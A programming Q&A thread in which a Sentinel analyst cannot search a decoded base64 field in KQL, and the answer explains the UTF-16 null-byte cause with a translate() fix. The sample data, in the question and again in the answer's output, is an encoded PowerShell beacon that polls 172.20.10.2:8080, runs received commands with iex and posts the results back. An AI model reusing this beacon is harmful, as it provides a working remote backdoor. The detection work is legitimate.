# KQL string function not parsing all characters

Tags: kql, azure-sentinel

I'm having difficulty searching a field for a value in KQL.

The field I am searching I get by decoding a base64 encoded string using the built in function `base64_decode_tostring()`. The string I am decoding is:

`JABzAD0AJwAxADcAMgAuADIAMAAuADEAMAAuADIAOgA4ADAAOAAwACcAOwAkAGkAPQAnADYAOAAwADcAOQBhADAAYgAtADMANgA5ADAAMwAyADEAZAAtADEANgA2ADgAZABjADYAMQAnADsAJABwAD0AJwBoAHQAdABwADoALwAvACcAOwAkAHYAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACAALQBVAHIAaQAgACQAcAAkAHMALwA2ADgAMAA3ADkAYQAwAGIAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAIgBYAC0AOQAyAGQAOQAtAGEAYgA2ADEAIgA9ACQAaQB9ADsAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQB7ACQAYwA9ACgASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMwA2ADkAMAAzADIAMQBkACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtADkAMgBkADkALQBhAGIANgAxACIAPQAkAGkAfQApAC4AQwBvAG4AdABlAG4AdAA7AGkAZgAgACgAJABjACAALQBuAGUAIAAnAE4AbwBuAGUAJwApACAAewAkAHIAPQBpAGUAeAAgACQAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAC0ARQByAHIAbwByAFYAYQByAGkAYQBiAGwAZQAgAGUAOwAkAHIAPQBPAHUAdAAtAFMAdAByAGkAbgBnACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAHIAOwAkAHQAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABwACQAcwAvADEANgA2ADgAZABjADYAMQAgAC0ATQBlAHQAaABvAGQAIABQAE8AUwBUACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtADkAMgBkADkALQBhAGIANgAxACIAPQAkAGkAfQAgAC0AQgBvAGQAeQAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAZQArACQAcgApACAALQBqAG8AaQBuACAAJwAgACcAKQB9ACAAcwBsAGUAZQBwACAAMAAuADgAfQA=`

**This String decodes to what I expect in the decodedString Column:**

`$s='172.20.10.2:8080';$i='68079a0b-3690321d-1668dc61';$p='http://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/68079a0b -Headers @{"X-92d9-ab61"=$i};while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/3690321d -Headers @{"X-92d9-ab61"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/1668dc61 -Method POST -Headers @{"X-92d9-ab61"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}`

**It can be seen here in the results table:**
[image: Decoded String in Results]

When I try and use a `| where decodedString contains "X-92d9-ab61"` clause to detect the string value in the decodedString, Sentinel says there are no results. However I can clearly see this string in my `decodedString` column above.

[image: Where clause with no results]

In fact, the where clause won't detect anything, unless it is a single character included in the decodedString column.

*Why will it only detect single characters? Why will it not detect more than a one character string?*

Comment: Not reproduceable (because you didn't share a data sample) and doesn't seem to make much sense. Why decoding the entire data instead of encoding only the search term?

Comment: P.S if your function accepts payload as string what's the point of converting it to string?

Comment: I can't share a dataset as confidential. The purpose of it accepting a string as a payload is because it decodes a base64 encoded string to a human readable UTF-8 string. Then I want to search for values in the UTF-8 but I can't because of the way the `base64_decode_tostring()` method is only returning what seems like a char array. As I said, when I try to search for more than one character in the `decodedString` it shows no results - however, I can clearly see the results when I use a where clause for one or fewer characters

Comment: **(1)** You don't need to share data; you need to supply one record with fictive data. **(2)** No. `(payload:string)` means that payload is of type string or converted to string when passed to the function. `tostring(payload)` makes no sense.

Answer (score 1, accepted):

ADX (Azure Data Explorer) aka Kusto, is the service used as a database for Azure Sentinel.
As the ADX documentation states ["Internally, strings are encoded in UTF-8"](https://learn.microsoft.com/en-us/azure/data-explorer/kusto/query/scalar-data-types/string).

According to the phenomena you described, and the string you supplied ("AGUAcgBzACAAQAB7ACIAWAAtADkAMgBkADkALQBhAG") it seems that your original data is of a different encoding, most likely UTF-16BE, therefore after ingestion you see your text as characters separated by the [null](https://en.wikipedia.org/wiki/Null_character) character.

Something like this:
[image: String example]

The recommended solution would be to convert your data to UTF-8 before ingesting it to Azure Sentinel.

---

**Update**

If the string is constructed only from ASCII characters, we can get a valid, searchable UTF-8 string by removing the NULL characters.

```
let str = "JABzAD0AJwAxADcAMgAuADIAMAAuADEAMAAuADIAOgA4ADAAOAAwACcAOwAkAGkAPQAnADYAOAAwADcAOQBhADAAYgAtADMANgA5ADAAMwAyADEAZAAtADEANgA2ADgAZABjADYAMQAnADsAJABwAD0AJwBoAHQAdABwADoALwAvACcAOwAkAHYAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACAALQBVAHIAaQAgACQAcAAkAHMALwA2ADgAMAA3ADkAYQAwAGIAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAIgBYAC0AOQAyAGQAOQAtAGEAYgA2ADEAIgA9ACQAaQB9ADsAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQB7ACQAYwA9ACgASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMwA2ADkAMAAzADIAMQBkACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtADkAMgBkADkALQBhAGIANgAxACIAPQAkAGkAfQApAC4AQwBvAG4AdABlAG4AdAA7AGkAZgAgACgAJABjACAALQBuAGUAIAAnAE4AbwBuAGUAJwApACAAewAkAHIAPQBpAGUAeAAgACQAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAC0ARQByAHIAbwByAFYAYQByAGkAYQBiAGwAZQAgAGUAOwAkAHIAPQBPAHUAdAAtAFMAdAByAGkAbgBnACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAHIAOwAkAHQAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABwACQAcwAvADEANgA2ADgAZABjADYAMQAgAC0ATQBlAHQAaABvAGQAIABQAE8AUwBUACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtADkAMgBkADkALQBhAGIANgAxACIAPQAkAGkAfQAgAC0AQgBvAGQAeQAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAZQArACQAcgApACAALQBqAG8AaQBuACAAJwAgACcAKQB9ACAAcwBsAGUAZQBwACAAMAAuADgAfQA=";
print translate("\0", "", base64_decode_tostring(str))
```

| print_0 |
| --- |
| $s='172.20.10.2:8080';$i='68079a0b-3690321d-1668dc61';$p='http://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/68079a0b -Headers @{"X-92d9-ab61"=$i};while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/3690321d -Headers @{"X-92d9-ab61"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/1668dc61 -Method POST -Headers @{"X-92d9-ab61"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8} |

[Fiddle](https://dataexplorer.azure.com/clusters/help/databases/Samples?query=H4sIAAAAAAAAA61UTU/bQBC991dEOYHUQ0pdIKo4vI0dxxA3bMGAo0oocdwFEiVpPljCr%20%2082ahIbU9VD9Zodjwzb9683Vm9aaw3q8ZZo3kO84q4hXOPF8QVcoct4gw5aJO9zTBwiBADA8CjU2HgMUU6xaXFHHEZziV/YM0D/ysdNohzfHH4RD/32LHeEDxPeH6E2Ilvnpifa501BI8PeMwCPYuJ%20gv0PZ5/9e2V0tecI40wceYZ6RpDK3W7lVjziG5G%204JeQfvKOhn7dgtU3syQZCh5LvhLbyzSBJUL/tiZOTpA35ob9DKMLBw6FhXYNycOxS28fEQs%20VbmTrNQP3Hs94DU0u74fwYD9NbInCnRaQk/woPEB8QrfUvlIZE42uwzsqZNHiacn3ggeAXPhfa3xPkBaYELa074f%20mZ53BlzZa8jL1ZMS7472hLZ65oKxvyZP7W23w5cXZ0fm%20WSHMUEPwyd/AjDD3nb%20GG8wieTHEAqpvOKfd6RB6Ej1fVjTXTff1M%209NnX/Ir5xbEneFWdSB5TuJi%208pbRl28MC66Un19t1iiE8F67jmiHmbB4oTxoSM%20RzxP%2075b9hOccyQR%20VBf9L1kvFb9sD7nK1Aj7Lfcz/lV95Yxb4ckoT5augfWkfxC/VPq4c//uyXnVZ5K6jD11KVjn8Fb30vqcqJ6zDnP7jfdqa4ryL5k39eedRbc09Nex1on1LP/fg%20cUT70vlHfvF9/v5c657UV3iV/BPZhHbk3ySn5KP7zvrWfdaFPbcN%20b725Rm8a9Cv1x1bepa7es4i4%20s50yUPpQ95IdVDhzuKY74fot0Ci79QWifLT4jtQ21BP5l%20QB%20FvpXy4oBfB%20YP71nrkS3VS8f616QueNfOlnqcf3kvHOc6an98tV4/zTWOzGs3Xs9GmPmh%20azXfN5ryjUfr%20ji6n9TVYlLfbxbyHj/O3YGYw8OfP6gos6AFAAA=)

Comment: I have updated the question, hopefully this will make it easier to understand

Comment: It could have made my life easier, but at least now we have a decent question with a reproducible scenario. The answer stays the same.

Comment: Then why is the decodedString value displayed in clear text in the results? That is what I don't understand. I can see the data in the results is not how this answers displays. Plus I am decoding the string using a built in function which according to MS docs states: "will return null if the string is not valid". Therefore I know the decode function is not failing

Comment: **(1)** I have no idea how Azure Sentinel is displaying text. Maybe it's using UTF-16. Maybe it simply doesn't display NULL characters. **(2)** Bytes are bytes, and those bytes can also be interpreted as a valid UTF-8 string (with a lot of NULLS though) **(3)** See updated answer